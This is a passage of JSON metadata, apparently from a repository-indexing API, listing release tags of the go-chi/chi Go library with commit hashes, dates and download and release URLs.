commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2